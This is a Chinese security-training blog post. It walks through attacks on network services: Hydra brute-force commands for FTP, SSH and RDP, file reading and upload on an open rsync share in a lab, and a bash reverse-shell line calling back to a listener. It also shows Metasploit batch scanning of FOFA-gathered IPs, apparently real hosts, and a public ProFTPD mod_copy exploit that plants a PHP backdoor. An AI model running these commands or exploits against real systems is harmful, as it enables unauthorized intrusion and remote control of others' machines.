【小迪安全2023】第57天:服务攻防-应用协议&Rsync&SSH&RDP&FTP&漏洞批扫&口令猜解

🍬 博主介绍

👨‍🎓 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~
✨主攻领域:【渗透领域】【应急响应】 【Java、PHP】 【VulnHub靶场复现】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!


目录

大纲

知识点

1、口令猜解-Hydra-FTP&RDP&SSH

2、配置不当-未授权访问-Rsync 文件备份

3、MSF配合fofa进行批量检测

4、协议漏洞-应用软件-FTP&Proftpd 搭建


大纲

知识点

1、服务攻防-远程控制&文件传输等

2、远程控制-RDP&RDP&弱口令&漏洞

3、文件传输-FTP&Rsync&弱口令&漏洞

#章节内容:
常见服务应用的安全测试:
1、配置不当-未授权访问
2、安全机制-特定安全漏洞
3、安全机制-弱口令爆破攻击
 
#前置知识:
应用服务安全测试流程:见图
1、判断服务开放情况-端口扫描&组合应用等
2、判断服务类型归属-数据库&文件传输&通讯等
3、判断服务利用方式-特定漏洞&未授权&弱口令等

1、口令猜解-Hydra-FTP&RDP&SSH

Hydra爆破工具:

GitHub - vanhauser-thc/thc-hydra: hydra

但是我们平常做渗透测试爆破口令之类的都直接在kali里面使用,kali自带很多工具,下面这个是一个很强大的爆破字典:

GitHub - TheKingOfDuck/fuzzDicts: Web Pentesting Fuzz 字典,一个就够了。

hydra是一个自动化的爆破工具,暴力破解弱密码,
是一个支持众多协议的爆破工具,已经集成到KaliLinux中,直接在终端打开即可
-s PORT 可通过这个参数指定非默认端口。
-l LOGIN 指定破解的用户,对特定用户破解。
-L FILE 指定用户名字典。
-p PASS 小写,指定密码破解,少用,一般是采用密码字典。
-P FILE 大写,指定密码字典。
-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。
-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。
-M FILE 指定目标列表文件一行一条。
-o FILE 指定结果输出文件。
-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
-t TASKS 同时运行的线程数,默认为16。
-w TIME 设置最大超时的时间,单位秒,默认是30s。
-v / -V 显示详细过程。
server 目标ip
service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等。
例子:
FTP:文件传输协议
RDP:Windows远程桌面协议
SSH:Linux安全外壳协议
 
 
ftp爆破:hydra -L test -P 10top1K.txt 47.110.53.159 ftp -V
ssh爆破:hydra -l root -P 10top1K.txt 47.110.53.159 ssh -V
rdp爆破:hydra -l administrator -P 10top1K.txt 47.110.53.159 rdp -V
 
字典:fuzzDicts-master项目

爆破rdp密码:

利用ftp自动化部署工具,部署一个ftp,利用hydra进行爆破

ftp爆破最大的特点是账号密码都不确定,账号密码都需要使用字典

这里由于节省时间,直接告诉他账号,真是环境账号密码都需要利用字典

2、配置不当-未授权访问-Rsync 文件备份

rsync 文件传输协议-linux  端口873

配置不当会造成未授权访问。没有配置ACL或者访问密码,可以读取目标服务器文件

靶场环境地址:

Vulfocus 漏洞威胁分析平台

判断是否有该漏洞的方法:

┌──(root💀kali)-[~/桌面]
└─# rsync rsync://123.58.224.8:52334

利用读取文件,拿到flag

┌──(root💀kali)-[~/桌面]
└─# rsync rsync://123.58.224.8:52334/src

┌──(root💀kali)-[~/桌面]
└─# rsync rsync://123.58.224.8:52334/src/tmp/     #这里tmp目录后面一定要接/,要不然flag找不到

上次文件:

┌──(root💀kali)-[~/桌面]
└─# rsync -av kali.png  rsync://123.58.224.8:21419/src/tmp/kali.png
sending incremental file list
kali.png

sent 512,846 bytes  received 35 bytes  341,920.67 bytes/sec
total size is 512,626  speedup is 1.00
                                                                                                                                                                           
┌──(root💀kali)-[~/桌面]
└─# rsync rsync://123.58.224.8:21419/src/tmp/                  
drwxrwxrwt          4,096 2024/04/23 22:51:30 .
-rw-r--r--              0 2024/04/23 22:44:18 flag-{bmhad0ff7c7-f192-4388-bba9-1911279ec5a9}
-rwxrw-rw-        512,626 2024/04/19 04:24:19 kali.png

反弹shell:

先把/etc/crontab进程任务下载到本地当前目录下

写个反弹shell:

#!/bin/bash
/bin/bash -i >& /dev/tcp/10.10.10.128/9999 0>&1

详细步骤如下:

kali提前进行反弹shell监听,

由于我这个使用的是在线的靶场环境,所以时间不够,师傅们可以使用本地docker启动环境,具体参考文章如下:

Vulhub - Docker-Compose file for vulnerability environment

3、MSF配合fofa进行批量检测

Fofa_Viewer是一个简单易用的fofa客户端,由 WgpSec狼组安全团队 f1ashine 师傅主要开发。程序使用 JavaFX 编写,便于跨平台使用,相比与web端的方式查询,其启动与搜索速度都有比较明显的提升!接下来介绍一下如何使用吧!

# JDK8 版本
链接:https://pan.baidu.com/s/1Tq4v04d4Axoun4SYo2JCew 
提取码:lnke
# JDK11 以及更高的 Java 版本
链接:https://pan.baidu.com/s/1TwjkvCdIYuOn6_TByojkRQ 
提取码:0uob

输入下面的命令以后,需要我们手动修改如下的配置:

java -jar fofaviewer.jar

小迪的查询结果:

配合msfconsole

我这里随机把小迪的一些IP来测试,保存在ip.list文件中

然后我们再在kali上打开MSF

msf6 > use auxiliary/scanner/rsync/modules_list 
msf6 auxiliary(scanner/rsync/modules_list) > show options 

Module options (auxiliary/scanner/rsync/modules_list):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   RHOSTS                                yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                873              yes       The target port (TCP)
   TEST_AUTHENTICATION  true             yes       Test if the rsync module requires authentication
   THREADS              1                yes       The number of concurrent threads (max one per host)

msf6 auxiliary(scanner/rsync/modules_list) > set rhosts file:/root/桌面/ip.list
rhosts => file:/root/桌面/ip.list
msf6 auxiliary(scanner/rsync/modules_list) > set threads 10
threads => 10

run一下,

[+]号代表有该漏洞

为了确认是否正确,这里开一台靶机测试,扫描后发现成功发现了。

4、协议漏洞-应用软件-FTP&Proftpd 搭建

proftpd 是linux软件启动ftp服务

ProFTPD是ProFTPD团队的一套开源的FTP服务器软件。该软件具有可配置性强、安全、稳定等特点。

靶场环境:

Vulfocus 漏洞威胁分析平台

访问漏洞地址,是个apache页面

我们使用官网的exp进行执行命令:

GitHub - t0kx/exploit-CVE-2015-3306: ProFTPd 1.3.5 - (mod_copy) Remote Command Execution exploit and vulnerable container

执行下面的命令

python exploit.py --host 123.58.224.8 --port 42907 --path "/var/www/html/"

然后访问/backdoor.php?cmd=whoami,就可以进行任意命令执行了

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-04-25 06:18:01       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-04-25 06:18:01       100 阅读
  3. 在Django里面运行非项目文件

    2024-04-25 06:18:01       82 阅读
  4. Python语言-面向对象

    2024-04-25 06:18:01       91 阅读

热门阅读

  1. MySQL_day1

    2024-04-25 06:18:01       32 阅读
  2. 在Docker中运行Jenkins容器:从入门到实践

    2024-04-25 06:18:01       31 阅读
  3. 各种类型游戏的乐趣与魅力

    2024-04-25 06:18:01       30 阅读
  4. 架构师系列-Nginx、OpenResty(三)- 负载均衡配置

    2024-04-25 06:18:01       30 阅读